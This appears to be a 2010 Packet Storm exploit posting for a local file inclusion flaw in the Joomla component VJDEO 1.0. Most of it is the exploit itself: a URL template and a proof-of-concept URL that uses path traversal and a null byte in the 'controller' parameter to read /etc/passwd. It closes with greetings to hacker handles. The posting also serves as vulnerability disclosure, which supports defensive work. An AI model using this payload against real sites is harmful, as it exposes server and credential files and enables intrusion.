Joomla VJDEO 1.0 Local File Inclusion

2010-04-07T00:00:00
ID PACKETSTORM:88177
Type packetstorm
Reporter Angela Zhang
Modified 2010-04-07T00:00:00

Description

                                        
                                            `(o)=====================================================================================(o)  
  
Joomla Component VJDEO 1.0 LFI Vulnerability  
  
  
Vendor : http://www.joomla.ternaria.com/  
Author : Angela Zhang  
Contact : mizz_4ng3l@yahoo.com  
Date : 07 - April - 2010  
  
(o)======================================================================================(o)  
  
  
  
[o] Exploit  
  
http://localhost/[path]/index.php?option=com_vjdeo&controller=[LFI]  
  
  
[o] PoC  
  
http://localhost/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00  
  
  
  
(o)===========================================================================================(o)  
  
Greetz : -:- 3SomeCrew -:-  
  
Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , mywisdom , s4va,   
Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk  
  
  
  
(o)===========================================================================================(o)  
  
  
  
`